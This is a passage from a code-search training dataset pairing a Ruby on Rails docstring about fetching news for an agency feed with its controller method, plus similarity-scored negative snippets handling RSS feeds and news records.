"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to edit_dashboard_category_path(@category), notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @gtfs_agency = GtfsAgency.find(params[:id])\n\n respond_to do |format|\n if @gtfs_agency.update_attributes(params[:gtfs_agency])\n format.html { redirect_to(@gtfs_agency, :notice => 'Gtfs agency was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @gtfs_agency.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @description = args[:description] if args.key?(:description)\n @description_score = args[:description_score] if args.key?(:description_score)\n @identifier = args[:identifier] if args.key?(:identifier)\n @language = args[:language] if args.key?(:language)\n @title = args[:title] if args.key?(:title)\n @title_score = args[:title_score] if args.key?(:title_score)\n @url = args[:url] if args.key?(:url)\n end",
"def update\n respond_to do |format|\n if @activity_category.update(activity_category_params)\n format.html { redirect_to @activity_category, notice: 'Activity category was successfully updated.' }\n format.json { render :show, status: :ok, location: @activity_category }\n else\n format.html { render :edit }\n format.json { render json: @activity_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @agency.update_attributes(params[:agency])\n format.html { redirect_to @agency, notice: 'Agency was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @agency.update(agency_params)\n format.html { redirect_to @agency, notice: \"Agency was successfully updated.\" }\n format.json { render :show, status: :ok, location: @agency }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.65837145",
"0.64573747",
"0.6200794",
"0.6153669",
"0.61454356",
"0.60933644",
"0.6020954",
"0.6004011",
"0.5993255",
"0.5993255",
"0.59900177",
"0.5969397",
"0.59490365",
"0.5918142",
"0.5916518",
"0.59069264",
"0.59056515",
"0.5890757",
"0.5870441",
"0.5852912",
"0.584154",
"0.5839768",
"0.5837084",
"0.5821869",
"0.57992446",
"0.5778685",
"0.5766098",
"0.5754019",
"0.57430816",
"0.57398593",
"0.5735532",
"0.57210743",
"0.5716795",
"0.5707845",
"0.57028526",
"0.570151",
"0.57002527",
"0.5700005",
"0.5698908",
"0.56979334",
"0.56915724",
"0.56901616",
"0.56839263",
"0.5672558",
"0.5666147",
"0.566445",
"0.5658947",
"0.5629445",
"0.5613751",
"0.56102353",
"0.56102353",
"0.5607317",
"0.56004095",
"0.5599534",
"0.5594642",
"0.55893165",
"0.55891097",
"0.5575447",
"0.5573105",
"0.5570012",
"0.5563071",
"0.5554586",
"0.5546095",
"0.55357116",
"0.55319035",
"0.5528975",
"0.5527944",
"0.55095166",
"0.5506601",
"0.5500641",
"0.549958",
"0.5498739",
"0.5498549",
"0.54926527",
"0.54921997",
"0.5490094",
"0.548722",
"0.54858935",
"0.54799795",
"0.54692596",
"0.54628354",
"0.5458105",
"0.5456895",
"0.54532415",
"0.5449103",
"0.5449103",
"0.5441149",
"0.54390234",
"0.5437966",
"0.54346687",
"0.54336345",
"0.5433417",
"0.54332066",
"0.54315686",
"0.5420424",
"0.5417793",
"0.5416503",
"0.5415058",
"0.5413418",
"0.5412841"
] | 0.69128275 | 0 |
GET /agencyfeed/:id/fetch_news.json fetches all the news and updates the DB for a specific AgencyFeed. | def fetch_news
@news = News.fetch_and_store_news! @agencyfeed
render template: 'news/list', status: :ok
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def fetch\n ##\n # an array of { category_id: number, news: array }\n @fetched = News.fetch_and_store_news_from_all_agency_feed!\n render :fetch, status: :ok\n end",
"def fetch_data\n rss_provider = RssProvider.find(params[:format])\n unless rss_provider.rss_url.include?(\"indiatvnews\" ) || rss_provider.rss_url.include?(\"hindu\" ) || rss_provider.rss_url.include?(\"zee\" )\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n feeds = xml[\"rss\"][\"channel\"][\"item\"]\n feeds.each do |feed|\n if rss_provider.rss_url.include?(\"indiatoday\" )\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n\n\n index_of_summary = feed[\"description\"].index(\"</a>\")\n summary = feed[\"description\"][index_of_summary..].delete_prefix(\"</a> \")\n index_of_image = feed[\"description\"].index(\"src\")\n image_url = feed[\"description\"][(index_of_image+5)..(index_of_summary-4)]\n News.create(title: feed[\"title\"], summary: summary, \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: image_url,\n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n end\n\n \n elsif rss_provider.rss_url.include?(\"news18\")\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n index_of_image = feed[\"description\"].index(\"https\")\n summary_index = feed[\"description\"].index(\" />\")\n last_index_of_image = feed[\"description\"].index(\"jpg\")\n image_url = feed[\"description\"][(index_of_image)..(last_index_of_image)] + \"pg\"\n summary = feed[\"description\"][(summary_index+3)..]\n News.create(title: feed[\"title\"], summary: summary,published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: image_url, rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n\n elsif rss_provider.rss_url.include?(\"bbc\")\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n News.create(title: feed[\"title\"], summary: feed[\"description\"], \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: feed[\"fullimage\"], \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n\n elsif rss_provider.rss_url.include?(\"ndtv\")\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n News.create!(title: feed[\"title\"], summary: feed[\"description\"], \n published_on: feed[\"updatedAt\"], url: feed[\"link\"], media_url: feed[\"fullimage\"], \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id,provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n\n \n elsif rss_provider.rss_url.include?(\"timesofindia\")\n title = News.find_by(title: feed[\"title\"])\n\n unless title.present?\n\n if rss_provider.category.category_name == \"Top Story\" \n News.create(title: feed[\"title\"], summary: feed[\"description\"], \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: \"\", \n rss_provider_id: rss_provider.id,category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: 
Time.now.localtime) \n else\n unless feed[\"description\"] == nil \n index_of_image = feed[\"description\"].index(\"src\")\n last_index_of_image = feed[\"description\"][index_of_image..].index(\"/>\")+index_of_image\n image_url = feed[\"description\"][(index_of_image+5)..(last_index_of_image-3)]\n summary_index = feed[\"description\"].index(\"</a>\")\n summary = feed[\"description\"][(summary_index+4)..]\n News.create(title: feed[\"title\"], summary: summary, \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: image_url, \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n end\n end\n \n\n end\n\n end\n end\n\n unless rss_provider.rss_url.include?(\"timesofindia\" ) || rss_provider.rss_url.include?(\"ndtv\" ) || rss_provider.rss_url.include?(\"bbc\" ) ||\n rss_provider.rss_url.include?(\"news18\") || rss_provider.rss_url.include?(\"indiatoday\") \n\n\n if rss_provider.rss_url.include?(\"indiatvnews\" )\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n index_of_summary = feed.summary.index(\"</a>\")\n summary = feed.summary[index_of_summary+4..]\n index_of_image = feed.summary.index(\"src\")\n image_url = feed.summary[(index_of_image+5)..(index_of_summary-5)]\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: summary, \n published_on: feed.published, url: feed.url, media_url: image_url, \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n elsif rss_provider.rss_url.include?(\"thehindu\")\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: feed.summary.strip, \n published_on: feed.published, url: feed.url,rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n elsif rss_provider.rss_url.include?(\"zee\")\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: feed.summary.strip, \n published_on: feed.published, url: feed.url,rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n end\n\n unless rss_provider.rss_url.include?(\"timesofindia\" ) || rss_provider.rss_url.include?(\"ndtv\" ) || rss_provider.rss_url.include?(\"bbc\" ) ||\n rss_provider.rss_url.include?(\"news18\") || rss_provider.rss_url.include?(\"indiatoday\") ||\n 
rss_provider.rss_url.include?(\"indiatvnews\") || rss_provider.rss_url.include?(\"thehindu\") ||\n rss_provider.rss_url.include?(\"zee\")\n\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: feed.summary.strip, \n published_on: feed.published, url: feed.url,rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n end\n redirect_to admin_rss_providers_path, alert: \"Fetched Successfully \"\n\n end",
"def news_feed\n begin\n client = Feedlr::Client.new(oauth_access_token: ENV['FEEDLY_OAUTH_ACCESS_TOKEN'])\n @latest_list = {}\n client.user_unread_counts.unreadcounts.each do |unread_articles|\n next if unread_articles['count'] == 0\n unread_article_items = client.stream_entries_contents(unread_articles.id, unreadOnly: true).items\n next if unread_article_items.empty?\n\n unread_article_items.each do |article|\n @latest_list[article.alternate[0].href] = \"◼︎ <a href='#{article.alternate[0].href}'>#{article.title} - #{article.origin.title}</a>\"\n end\n client.mark_article_as_read(unread_articles.id)\n end\n @latest_news = @latest_list.values.join(\"<br>\")\n rescue => evar\n fail evar\n end\n @latest_news\n end",
"def crawl\n update_all_feeds\n fetch_and_store_articles\n end",
"def set_news_feed\n @news_feed = NewsFeed.find(params[:id])\n end",
"def fetch!\n parsed_feed = FeedNormalizer::FeedNormalizer.parse open(self.feed_url)\n \n self.update_attributes( :title => parsed_feed.title,\n :url => parsed_feed.url\n #:etag => parsed_feed.etag\n #:last_modified => parsed_feed.last_modified\n )\n \n parsed_feed.entries.each do |entry|\n self.entries.create(:url => entry.url,\n :title => entry.title,\n :author => entry.author,\n #:summary => entry.summary,\n :content => entry.content\n #:published => entry.published\n #:categories => entry.categories\n ) if !Entry.find_by_url(entry.url)\n end\n end",
"def news_for_feed(feed_id)\n news = []\n\n where(:user_id => User.current_user_id, :feed_id => feed_id).each do |news_item|\n news.push news_item.attributes\n end\n\n news\n end",
"def set_newsfeed\n @newsfeed = Newsfeed.find(params[:id])\n end",
"def newsfeed\n check_auth :newsfeed\n \n response = connection.post do |req|\n req.url '/user/newsfeed'\n req.body = { :format => @format }\n end\n response\n end",
"def handle_news\n @feeder.send_feed(message.chat.id)\n end",
"def feed!\n http_fetch(feed_url)\n end",
"def get_new_articles\n # Download the RSS feed and save to self.doc\n get_source\n \n # Keep track of which articles are in the feed \n articles = []\n \n article_links = (self.doc/'li.mjItemMain').collect do |mjItem|\n mjItem.at('a.mjLinkItem')\n end\n \n # For each item in the RSS feed \n article_links.each_with_index do |link, index|\n \n # Create or update the article in the db\n articles << Article.factory(\n :category => self.category,\n :description => '',\n :feed => self,\n :url => \"http://online.wsj.com#{link.attributes['href']}\",\n :priority => index\n )\n end\n \n articles\n end",
"def set_news_latest\n @news_latest = NewsLatest.find(params[:id])\n end",
"def fetch_from_news_feed\n unless self.facebook_omniauth.blank?\n fb_user = self.facebook_client_user\n unless fb_user.blank?\n posts = fb_user.home # fetch posts\n Movie.name_is_not_blank.name_without_dictionary_word.this_year.each do |movie|\n posts.each do |post|\n FacebookFeed.create_facebook_post(post, movie, post.from)\n User.pull_comments(post, movie) #check for comments is present\n end # each post end\n end # movie end\n end\n end\n end",
"def set_official_news\n @official_news = OfficialNews.find(params[:id])\n end",
"def news\n do_scrape\n @posts = UbuEntry.all(:order => \"id DESC\", :limit => 400)\n render :layout => false, :content_type => Mime::RSS\n end",
"def index\n domain = 'www.hs-karlsruhe.de'\n site_master = '/fakultaeten/fk-iwi/masterstudiengaenge/fk-iwiim/aktuell.html' \n site_bachelor = '/fakultaeten/fk-iwi/bachelorstudiengaenge/fk-iwiib/aktuell.html' \n site_general = '/fakultaeten/fk-iwi/aktuelles.html'\n\n file_master = \"aktuell_master.html\"\n file_bachelor = \"aktuell_bachelor.html\"\n file_general = \"aktuell_general.html\"\n\n # If the data is too old, fetch new data\n Rails.logger.info(\"data is too old?\")\n Rails.logger.info(\"age: \" + (Time.now - @@lastFetch).to_s)\n @news = News.find(:all)\n\n if Time.now - @@lastFetch > 2.hour or @news.empty? then \n Rails.logger.info(\"fetching new data!\")\n # delete all stored news\n @news = Array.new\n News.delete_all\n @newsCount = 1\n\n\n\n downloadWebsite(domain, site_master, file_master)\n downloadWebsite(domain, site_bachelor, file_bachelor)\n downloadWebsite(domain, site_general, file_general)\n\n \n\n # Fetch Bachelor News\n parseForNews(file_master, \"IM\")\n parseForNews(file_bachelor, \"IB\")\n parseForNews(file_general, \"IWI\")\n\n @@lastFetch = Time.now\n end\n\n @updated_at = @@lastFetch\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @news }\n end\n end",
"def index\n @newsfeeds = Newsfeed.all\n end",
"def update\n @agencyfeed.update! agencyfeed_params\n render :show, status: :ok\n end",
"def fetch\n @feed = Feed.find(params[:id])\n @feed.fetch\n redirect_to :back, notice: 'Feed fetched OK'\n end",
"def set_news_update\n @news_update = NewsUpdate.find(params[:id])\n end",
"def index\n @response = HTTParty.get(\"http://newsapi.org/v2/top-headlines?category=sports&q=golf&apiKey=12e692d8e7254efa8cf6276ea99736b0\")\n @report = JSON.parse(@response.body)\n @article = @report[\"articles\"]\n end",
"def fetch\n puts \"Fetching feed: #{self.feed_url}\"\n Feedzirra::Feed.add_common_feed_entry_element('georss:point', :as => :point)\n Feedzirra::Feed.add_common_feed_entry_element('geo:lat', :as => :geo_lat)\n Feedzirra::Feed.add_common_feed_entry_element('geo:long', :as => :geo_long)\n Feedzirra::Feed.add_common_feed_element('generator', :as => :generator)\n\n feed = Feedzirra::Feed.fetch_and_parse(self.feed_url)\n\n self.update_attributes(\n :title => feed.title,\n :url => feed.url,\n :description => feed.description,\n :generator => feed.generator,\n :last_fetched => DateTime.now\n )\n\n feed.entries.each do |e|\n \n if e.geo_lat && e.geo_long\n latlon = [e.geo_lat, e.geo_long]\n elsif e.point\n latlon = e.point.split(' ')\n else\n next\n end\n \n attrs = {\n :title => e.title,\n :url => e.url,\n :author => e.author,\n :summary => e.summary,\n :content => e.content,\n :published => e.published,\n :guid => e.id,\n :lon => latlon[1].to_f,\n :lat => latlon[0].to_f\n }\n \n # Create a new post or update an existing one\n post = Post.find_or_initialize_by_url(e.url)\n post.feed = self\n post.assign_attributes(attrs)\n post.save\n end\n end",
"def index\n @news = Newsfeed.order(\"created_at DESC\")\n render json: { is_success: true, message: \"news fetch successful\", data: @news }, status: 200\n end",
"def set_article\n @feeds = Feed.find(params[:id])\n end",
"def show\n @news_update = NewsUpdate.find(params[:id])\n end",
"def set_news\n @news = New.where(:id => params[:id]).first\n end",
"def fetch_news(last_fetch = \"#{Date.today.to_s} 00:00:00\")\n x = build_news(parse_json(@filename), last_fetch)\n end",
"def read_news_item(url)\n where(:user_id => User.current_user_id, :url => url).update_all(:read => true)\n end",
"def feed\n @articles = Article.feed_list(current_user, params[:page])\n end",
"def article_feed\n \tArticle.all\n end",
"def fetch_articles\n response = $redis.get('news')\n if response.nil?\n base_uri = \"http://content.guardianapis.com/search?order-by=newest&type=article\"\n response = JSON.generate(HTTParty.get(base_uri + \"&api-key=\" + ENV['GUARDIAN_API_KEY'])[\"response\"][\"results\"])\n $redis.set(\"news\", response)\n $redis.expire(\"news\", 1.hours.to_i)\n end\n @response = JSON.load(response)\n end",
"def fetch_articles\n current_feed = get_rss_feed( self.url )\n current_feed.entries.each do |article|\n unless self.array_of_article_urls.include?(article.url)\n a = Article.new(title: article.title, url: article.url, clicks: 0)\n a.title ||= article.summary\n self.articles.push a \n end\n end\n\tend",
"def set_api_v1_news\n @api_v1_news = News.find(params[:id])\n end",
"def fetch_articles\n return unless any_new?\n (how_many? - 1).downto(0) do |index|\n next if added?(index)\n Article.create(title: feed.entries[index].title,\n description: description(index),\n published: feed.entries[index].published,\n link: feed.entries[index].url,\n site_id: id,\n readingtime: reading_time(index))\n end\n end",
"def set_article_news\n @article_news = ArticleNew.find(params[:id])\n end",
"def fetch_articles\n\t\trequire 'open-uri'\n\t\tnewest_article = Article.limit(1).order(\"date DESC\")\n\t\ttrigger = false\n\t\tarticles = Array.new\n\t\tcache_article = Article.new\n\n\t\tfile = open(URL)\n\t\tcontents = file.readlines\n\t\tcontents.each do |line|\n\t\t\tif trigger\n\t\t\t\t#Date\n\t\t\t\tif line =~ /[1-3]?[0-9]\\.1?[0-9]\\.201[0-9]{1}/\n\t\t\t\t\tcache_article.date = line.slice(/[1-3]?[0-9]\\.1?[0-9]\\.201[0-9]{1}/)\n\t\t\t\t\tif (newest_article[0] != nil && cache_article.date < newest_article[0].date)\n\t\t\t\t\t\treturn nil\n\t\t\t\t\tend\n\t\t\t\t#Title\n\t\t\t\telsif line =~ /<h2>.+<\\/h2>/\n\t\t\t\t\tline.slice!(\"<h2>\")\n\t\t\t\t\tline.slice!(\"<\\/h2>\")\n\t\t\t\t\tcache_article.title = replace_uml line.strip\n\t\t\t\t#Text\n\t\t\t\telsif line =~ /<p[^>]*>/\n\t\t\t\t\tcache_article.text = fetch_text cache_article.url\n\t\t\t\t\tcache_article.text = replace_uml cache_article.text\n\t\t\t\t\timage_url = fetch_image_url cache_article.url\n\t\t\t\t\tcache_article.news_image = URI.parse(image_url) \n\t\t\t\t\tarticle = Article.create(title: cache_article.title, url: cache_article.url, text: cache_article.text, date: cache_article.date, news_image: cache_article.news_image)\n\t\t\t\t\ttrigger = false\n\t\t\t\t#url\n\t\t\t\telsif line =~ /\\/de\\/newsdetail.+.html/\n\t\t\t\t\tcache_article.url = \"http://www.ehco.ch\" + line.slice(/\\/de\\/newsdetail.+.html/)\n\t\t\t\tend\n\t\t\telsif line.include? \"news-element newsarchiv\"\n\t\t\t\ttrigger = true\t\t\t\t\t\n\t\t\tend\n\t\tend\n\tend",
"def update\n @feed = current_user.feeds.find params[:id]\n current_user.refresh_feed @feed\n\n head :ok\n rescue => e\n handle_error e\n end",
"def set_news\n @news = New.find(params[:id])\n end",
"def update_rss(id, body)\n doc = Nokogiri::XML(body)\n doc.xpath('rss/channel/item').each do |i|\n title = i.xpath('title').text\n link = i.xpath('link').text\n st = @sql.prepare \"select exists(select 1 from article_lists where article_url=?)\"\n st.execute(link).each_with_index do |res, index|\n insert_article_list(res, id, title, link) if index == 0\n end\n end\n end",
"def set_news\n @news = New.find(params[:id])\n end",
"def index\n \n @news = News.all\n @latest_news = News.latest_news\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @news }\n end\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def index\n #pagination parameters\n page_size = params[:page_size] ? params[:page_size].to_i : Page_size\n page = params[:page] ? params[:page].to_i : 1\n offset = page_size*(page - 1)\n @news = News.limit(page_size).offset(offset).order('created_at desc').includes(:user, :comments)\n\n if @news.blank?\n render json: {status: \"FEED_EMPTY\", message: \"No news feeds\", data: {}}, status: :ok\n else\n news_data = []\n # format likes, comments and user for each news\n @news.each do |news|\n news_data << {news: news, comments: news.comments.count, likes: liked_user_id(news), user: news.user.username}\n end\n render json: {status: \"SUCCESS\", message: \"List of news feeds\", data: news_data}, status: :ok\n end\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news_hit\n @news_hit = NewsHit.find(params[:id])\n end",
"def refresh_all\n success_count = 0\n error_count = 0\n Topic.find_all_external.each do |topic|\n permalink = topic.permalink\n begin\n refresh_topic(topic)\n success_count += 1\n rescue\n log.error \"Error refreshing news for '#{permalink}': #{$!}\"\n error_count += 1\n end\n end #each\n if error_count > 0\n STDERR.puts \"*** #{error_count} errors occurred while refreshing \" +\n \"the news data.\"\n STDERR.puts \"See the intranet log for details.\"\n end #if\n log.info \"#{success_count} news topics were updated successfully.\"\n end",
"def set_api_v1_news_link\n @api_v1_news_link = Api::V1::NewsLink.find(params[:id])\n end",
"def get_news( category = \"home\" )\n url = \"https://api.nytimes.com/svc/topstories/v2/#{ category }.json\"\n options = { api_key: Rails.application.secrets.NY_TIMES_TOP_STORIES_KEY }\n\n response = HTTParty.get( url, :query => options )\n\n response\n end",
"def index\n @news_latests = NewsLatest.all\n end",
"def send_news\n feed = RSS::Parser.parse open(KAGDEV_RSS).read\n last_post_title = feed.channel.item.title\n\n # Check, whether the latest title of the post at KAG development\n # blog is still the same, as it was, when the fetcher checked it last\n # time.\n return if unchanged?(last_post_title)\n\n item = feed.channel.item\n\n last_post_date = item.pubDate\n last_post_author = item.dc_creator\n last_post_link = item.link\n\n News.create(\n :title => last_post_title,\n :date => last_post_date,\n :author => last_post_author,\n :link => last_post_link\n )\n\n real_author = reveal_author(last_post_author)\n short_link = open(\"http://clck.ru/--?url=#{last_post_link}\").read\n\n Bot::CHANNELS.each do |chan|\n Channel(chan).send I18n.news_fetcher.news(real_author, last_post_title, short_link)\n end\n rescue SocketError\n nil\n end",
"def fetch(feed_key)\n url = @feeds[feed_key.to_s]['url']\n puts \"Fetching #{url}\"\n begin\n feed = FeedTools::Feed.open(url)\n items = feed.items\n items.each do |item|\n @post = Post.find_or_initialize_by_link(item.link)\n @post.guid = item.id\n @post.title = item.title\n @post.link = item.link\n @post.time = item.time\n @post.feed = feed_key\n @post.tags = item.tags\n @post.content = item.content\n @post.permalink = @post.generated_permalink || item.link\n @post.media_thumbnail_link = item.media_thumbnail_link\n @post.save\n end\n rescue FeedTools::FeedAccessError => errmsg\n puts \"\\tFailed to fetch #{url}\\n\\t#{errmsg}\\n\\tSkipping #{url}\"\n end\n end",
"def index\n @agencyfeeds = AgencyFeed.all\n\n render :index, status: :ok\n end",
"def set_gg_news\n @gg_news = GgNews.find(params[:id])\n end",
"def show\n render json: NewsEntry.find(params[:id]).to_json(include: [:feed])\n end",
"def load_newest\n ids = @api.fetch_new_story_ids\n load_by_ids ids\n end",
"def rss\n render_rss_feed_for Announcement.find(:all, :order => 'created_at DESC',\n :limit => 10), {\n :feed => {\n :title => 'OpenMind New Announcements',\n :link => announcements_url,\n :pub_date => :created_at\n },\n :item => {\n :title => :headline,\n :description => :formatted_description,\n :link => Proc.new{|announcement| \"#{announcements_url}##{announcement.id}\" }\n }\n }\n end",
"def set_news_feed_link\n @news_feed_link = NewsFeedLink.find(params[:id])\n end",
"def index\n news_url = 'https://newsapi.org/v1/articles?source=national-geographic&sortBy=top&apiKey=ba8b42abfab743f3bfe37fe0f9df3557'\n response = HTTParty.get(news_url)\n @news_data = response\n\n @all_posts = current_user.posts\n # @new_post = Post.new #post is not tagged to user\n @new_post = current_user.posts.new\n end",
"def set_import_ma_news\n @import_ma_news = ImportMaNew.find(params[:id])\n end",
"def parse_feed url=rss_url, now = Time.now\n\n options = {\n user_agent: 'Geolinguist Test',\n max_redirects: 2,\n compress: true\n }\n\n\n f = Feedjira::Feed.fetch_and_parse url, options\n if f.url != rss_url.sub(RSS_SUFFIX,'')\n self.base_url = f.url.sub(RSS_SUFFIX,'').sub(SUFFIX,'')\n url = rss_url\n save\n f = Feedjira::Feed.fetch_and_parse url, options\n end\n\n\n if f.last_modified.blank?\n save_and_update_last_fetched now if self.last_fetched.blank?\n return\n end\n if last_fetched.blank? || f.last_modified > last_fetched\n puts f.inspect\n f.entries.each do |entry|\n if last_fetched.blank? || last_fetched < entry.published\n self.total_entries += 1\n body = [entry.title,entry.summary].join(\"\\n\")\n matches = LanguageRecognizer.recognize body\n if matches.blank?\n self.no_matches += 1\n else\n matches.each {|match| self[match] += 1}\n end\n end\n end\n save_and_update_last_fetched now\n end\n end",
"def news\n query = \"SELECT actor_id, post_id, target_id, created_time, updated_time, attribution, message, attachment, likes, comments, permalink, action_links FROM stream WHERE filter_key in (SELECT filter_key FROM stream_filter WHERE uid = '#{@user.id}' AND type = 'newsfeed')\"\n pp @session.fql_query(query)\nend",
"def refresh(force=false)\n # check headers and etag and last modified\n raise \"Missing feed_url\" if feed_url.nil?\n ff = Feedbase::FetchFeed.new(feed_url)\n headers = ff.headers\n if !force \n if last_etag && (headers[:etag] == last_etag)\n puts \"-- #{feed_url} -- ETag cache hit\"\n return\n end\n end\n data = ff.fetch \n params = data[:feed_params].merge(:alpha_title => make_alpha_title(data[:feed_params][:title])) \n if params[:feed_url] != self[:feed_url]\n if x = self.class.filter(:feed_url => params[:feed_url]).first\n raise Redirected.new(\"Redirected to existing feed: #{x.feed_url}\")\n end\n end\n params.delete(:feed_url) \n begin Sequel::DatabaseError\n update params\n rescue StandardError # PGError\n puts \"The offending record is #{self.inspect}\"\n raise\n end\n\n Feedbase::FeedDownload.create({feed_id: feed_id}.merge(data[:download_params])) \n items_created = data[:items].\n select {|item| Feedbase::Item[:guid => item[:guid]].nil?}.\n map { |item|\n params = {\n feed_id: feed_id,\n title: item[:title].encode(\"utf-8\"), \n guid: item[:guid], \n link: item[:link],\n content: item[:content],\n author: item[:author],\n word_count: item[:word_count],\n pub_date: item[:pub_date]\n }\n Feedbase::Item.create params\n }\n # caller can extract an item count from this\n items_created\n end",
"def set_news\n @news = News.friendly.find(params[:id])\n end",
"def insert_news_if_necessary(url)\n latest_date = latest_news_date(Feed.id_from_url(url))\n latest_date = Setting.keep_news_time if latest_date.zero?\n\n channel = Arss::FeedParser.parse_uri(url).feed['channel']\n return unless channel.has_key? 'items'\n\n channel['items'].each do |item|\n if Setting.get_delete_after_days.nonzero?\n next if (item['pubDate'] <= latest_date or item['pubDate'] < Setting.keep_news_time)\n end\n\n create(:user_id => User.current_user_id, :feed_id => Feed.id_from_url(url),\n :title => item['title'], :description => item['description'],\n :url => item['link'], :read => 0, :date => item['pubDate'])\n end\n end",
"def index\n @news_stories = NewsStory.all\n end",
"def latest_news(feed_url, options={})\n div_id = options[:div_id] || \"news_feed\"\n s = <<-EOF\n<div id=\"#{div_id}\"></div>\n\n<script type=\"text/javascript\">\n\n google.load(\"feeds\", \"1\");\n\n function #{div_id}_init() {\n var feed = new google.feeds.Feed(\"#{feed_url}\");\n feed.setNumEntries(3)\n feed.load(function(result) {\n if (!result.error) {\n var container = $(\"##{div_id}\");\n for (var i = 0; i < result.feed.entries.length; i++) {\n var entry = result.feed.entries[i];\n container.append('<div><div class=\"blog_title\"><a href=\"' + entry.link + '\">' + entry.title + '</a></div>'\n + '<div class=\"blog_body\">' + entry.contentSnippet + '</div>'\n + '<div class=\"blog_date\">' + entry.publishedDate + '</div>'\n + '</div>');\n }\n }\n });\n }\n google.setOnLoadCallback(#{div_id}_init);\n</script>\n EOF\n s.html_safe\n end",
